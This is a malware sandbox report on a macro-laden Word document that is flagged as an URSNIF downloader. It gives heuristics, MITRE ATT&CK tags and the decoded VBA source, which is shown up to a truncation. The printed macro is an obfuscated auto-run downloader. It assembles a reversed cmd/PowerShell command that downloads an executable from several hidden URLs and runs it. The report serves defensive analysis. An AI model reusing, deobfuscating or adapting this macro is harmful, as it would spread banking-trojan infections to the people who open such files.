MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute commands. The script attempts to construct a command string that appears to be related to downloading and executing a payload. The ClamAV detection also points to a downloader family.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5338 bytes |
SHA-256: de3feba88e0c6f05e2b47616091019cb93fc6e75818520fe716a7f3f4f864566 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "swzndmSFNX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Hour "Hi" + "SwB" + "PXV" + "419706368"
Hour "8024" + "368186678"
Hour "404636952" + "1548" + "69165687" + "2280"
Hour "4935" + "MnAfudEnAXlU" + "61784849" + "52819816"
Hour "450155142" + "vKbR" + "490964760" + "YNzfHzc"
VBA.Shell CleanString(sOi) + DCkbiEPPRzoV + AJOtpBBjddjmFv + CPBOTpQ + iLVzvVowIoh + tpAPzSzN + wQTataLzddU + BVuzZWziUtJ, 66 - 66
Hour "YGvr" + "521002708" + "TwmAXBwCZ" + "QQMjzEcIlnjZVA"
Hour "Ejd" + "3588" + "QvwJDS" + "blXA"
Hour "d" + "5353" + "tNihftM" + "411713477"
Hour "Kv" + "CE" + "l" + "BFsBztBWw"
End Sub
Attribute VB_Name = "smJcXmZq"
Function CPBOTpQ()
On _
Error _
Resume _
Next
Hour "YqAwDRt" + "MarU"
Hour "354710447" + "134464233" + "FLLOzPiT" + "pmwZPAt"
sMawGHjXZwm = "cmd /V^" + ":O/C" + Chr(2 + 4 + 5 + 4 + 19) + "^se" + "^t ^F" + "ec^" + "Q"
Hour "9317" + "9982"
Hour "RL" + "UnLNM"
Hour "6125" + "EOPi"
Hour "XfS" + "IE"
nBuZLjm = "=" + " ^ " + "^ ^ " + " ^" + " " + " ^ " + " }^}^" + "{^hc^"
Hour "GsdN" + "Lbrc" + "8314" + "5024"
Hour "uramBRiEkXhun" + "WjzMH" + "7637" + "4583"
cRJbjrInH = "t" + "^ac^}^;" + "k^a^e" + "rb;SEZ" + "^$^ ^" + "m" + "^et^I-" + "^ekovnI" + ";)^S"
Hour "Hj" + "kz"
Hour "cX" + "7454"
Hour "9655" + "i"
Hour "EfO" + "aMZpZwqqzbii"
maAuA = "^E^Z$ ," + "Bc" + "^j^$" + "(^e^l" + "i" + "^F" + "^d^aol" + "nwoD.^m" + "^"
Hour "m" + "3585"
Hour "TRSIvHzupEnqf" + "wR"
Hour "7415" + "3583" + "hSG" + "109474767"
QuLvfoWf = "Tf${^y" + "r" + "t^{)j^j" + "^U$ ni" + "^ B" + "cj$(hc" + "^ae" + "r^" + "of^;^'e" + "xe^.^" + "'+" + "^d^i^l"
CPBOTpQ = sMawGHjXZwm + nBuZLjm + cRJbjrInH + maAuA + QuLvfoWf
Hour "DaS" + "187338800"
Hour "Y" + "wsRriw" + "7501" + "JMwXRQRpiImCHw"
End Function
Function iLVzvVowIoh()
On _
Error _
Resume _
Next
Hour "255713992" + "VqtVECtUQ"
Hour "wXJkOJH" + "3911"
VnOTZRf = "^$^+'\^" + "'" + "^+ci^lb" + "^" + "up^:vn" + "e^" + "$^" + "=SEZ^$" + ";^'^01" + "^3' ^" + "= ^d^i" + "l$^;)'^" + "@"
Hour "348209725" + "rf" + "OYOhBIh" + "J"
Hour "MHGQllMN" + "1362066"
OhGOvuVcpZ = "^'(" + "^t^i" + "^l^p^S" + ".'n" + "^2Sq4O/" + "n^i" + ".a" + "^h" + "^t" + "^k^a//:" + "ptt^" + "h@UK^t" + "^H"
Hour "Bp" + "LlPCTdX"
Hour "iF" + "OzqdimPGv"
Hour "4810" + "aHd"
rELvs = "X^u/^" + "m^oc.^e" + "cn^e" + "^g^i" + "ll" + "^" + "etni^d"
Hour "35245425" + "399682069" + "J" + "Bs"
Hour "9652" + "9340" + "2341" + "vDKi"
RiwasZCGj = "^e^tc^" + "enn^oc^" + "i" + "//^:p" + "^t^t^"
Hour "mbKM" + "6774928" + "bRzfTmirl" + "YHQTtLMYrz"
Hour "NUSYrVInbji" + "j" + "513862292" + "3062"
Hour "LOX" + "97631000"
Khoij = "h@" + "S^MYM^X" + "/sser" + "^p" + "^xe"
Hour "413285322" + "464981444" + "217323693" + "DTPdmDfM"
Hour "NjwG" + "YMjj" + "oiQ" + "4222"
Hour "352887817" + "PTkOam"
Hour "pbTAZuk" + "w" + "s" + "313450680"
LImzsn = "^." + "^ps" + "p//:p^t" + "t^h^@T" + "^D^In^i" + "/^m" + "oc.^"
Hour "R" + "nsj"
Hour "8990" + "507888983" + "349606627" + "MzmVDl"
Hour "YNTZ" + "JDKu"
VmsuHw = "shc^e^" + "to^fni^" + "kg^" + "." + "dlo/" + "/:^ptt" + "h" + "@^y" + "kJJ"
Hour "346125187" + "Cli" + "FmnWYinkY" + "n"
Hour "5079" + "8722"
Hour "oRQ" + "aDK"
Hour "uwU" + "31852554"
DUTWIXzZpJ = "^tQ/t" + "i.vo^" + "g^" + ".a" + "^s" + "^or^" + "a^mic" + "o" + "^ir" + "^o^t" + "avr" + "^" + "esnoc"
Hour "531384224" + "ME"
Hour "8125" + "C"
Hour "ZJLZWUO" + "7143" + "9895" + "FNawhpaI"
fILWJv = "//:^p" + "t^t" + "^h'=^" + "j^jU$^;" + "^tneilC" + "^beW.t" + "^e"
Hour "NpUGvu" + "AtiatE" + "34816936" + "SrLpUFIO"
Hour "8542" + "YJpGsNtJd" + "I" + "dI"
Hour "TULiUWVO" + "PSNN" + "p" + "ZiHqkbHSV"
CnsLP = "N tc^e" + "^jbo" + "^-^w^" + "en=^m" + "Tf^$
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.